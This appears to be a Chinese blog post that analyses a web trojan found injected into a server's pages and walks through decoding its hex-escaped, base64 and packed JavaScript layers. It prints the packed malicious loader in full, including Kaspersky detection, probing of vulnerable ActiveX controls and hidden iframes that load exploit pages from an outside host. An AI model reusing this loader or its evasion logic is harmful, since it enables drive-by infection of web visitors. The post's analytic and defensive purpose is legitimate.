昨天一位服务器管理员群里说他的机子网页全被挂上了一种木马,于是开始以下逆向过程

首先看到的是16进制转义字符
JavaScript代码

1.

经过一次反转义再加一次BASE64解码得到
XML/HTML代码

1. http://OffIce.FAQSerV.CoM/FAQ.js

下载查看得到
JavaScript代码

1. document.write(‘‘);
2. document.write(‘‘);

分析以上2个网页

http://OffIce.FAQServ.com/FAQ.htm的是统计

http://www.59.vc/page/add_54738542.htm的代码

仍然是统计

又加密了下面是代码
XML/HTML代码

1. eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])pp=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c]);return p}(‘t=”*********F(&D(*&F*D&(F*&s”;1D I(){1C(i=2;i<1B;i++){l v=5 10();l u=5 10();l x=J.1A(1z+i);t="*********F(&D(*&F*D&(F*&s";v.6="Z:@Y:"+x+":\\\\X%W\\\\q%V\\\\q%U%T%1y.0\\\\S\\\\R.Q::/P/O.9";u.6="Z:@Y:"+x+":\\\\X%W\\\\q%V\\\\q%U%T%1x.0\\\\S\\\\R.Q::/P/O.9";4(v.N==M||u.N==M)L 1w}L 1v}l p=5 1u();p.1t(p.1s()+1r*K*K*1q);l H=5 J(8.E);l G="C=";4(!I()&&H.B(G)==-1){8.E="C=1p;1o="+p.1n();k{4(5 m("1m.1l.1"))8.j(\'<3 h=o:f 6="c://n.b/1k.9">\’)}a(e){}k{4(5 m(“1j.1i.1″))8.j(\’<3 h=o:f 6="c://n.b/1h.9">\’)}a(e){}k{4(5 m(“1g.1f”))8.j(\’<3 h=o:f 6="c://n.b/1e.9">\’)}a(e){}t=”*********F(&D(*&F*D&(F*&s”;k{4(1d.1c.1b().B(“A”+”1a 7″)==-1)8.j(\’<3 h=o:f 6="c://n.b/A.9">\’)}a(e){}k{4(5 m(“19″+”17.16″+”15.1″))8.j(\’<3 h=o:f 6="c://n.b/14.9">\’)}a(e){}k{4(5 m(“z”+”y”+”.z”+”y.1″))8.j(\’<3 h=d\'+\'13\'+\'12:f 6="c://w\'+\'18\'+\'.b/r\'+\'11.g\'+\'4">\’)}a(e){}}’,62,102,’|||iframe|if|new|src||document|gif|catch|vg|http|||none||style||write|try|var|ActiveXObject|w18|display|Then|Kaspersky||DFFFF|bbbbbbbbbbbbbbbbbbbbbbbbbkjkjkj|xxxxkis7|xxxxkis6||root|PCtl|IER|ms|indexOf|Cookie1||cookie||cookieHeader|fdsafasdfasdfcookie|bIsKIS|String|60|return|41|height|help|images|chm|context|Doc|20Security|20Internet|20Lab|20Files|Program|MSITStore|mk|Image|eal|lay|isp|baidu|ol|To|duBar||Bai|ie|toLowerCase|userAgent|navigator|xl|Vod|DPClient|lz|GLChatCtrl|GLCHAT|bf|StormPlayer|MPS|toGMTString|expires|POPWINDOS|1000|24|getTime|setTime|Date|false|true|207|206|65|fromCharCode|26|for|function’.split(‘|’),0,{}))

这才是关键,进入难点

想到EVA(zzzevazzz)的方法

打开那个网页

在浏览器栏填入
XML/HTML代码

1. javascript:s=document.documentElement.outerHTML;document.write(‘‘);document.body.innerText=s;

立刻在浏览器中得到解密

以下省略

其中包括6个软件漏洞,通过漏洞构造下载EXE文件并执行

某片断还检测卡巴斯基是否安装,如果没安装才进行

检测卡巴斯基的方式也很特殊,判断他的帮助文件CHM里的一个小图片是否存在

后来查资料才得知 这个病毒是2007几大

处理网页木马的关键:

EVA的解密方法处理花代码和混淆

16进制转义,base64编码

查资料中得到0GINr的FLOWERCODE的博客

结束。

Also see:

  • No Related Post
Subscribe in reader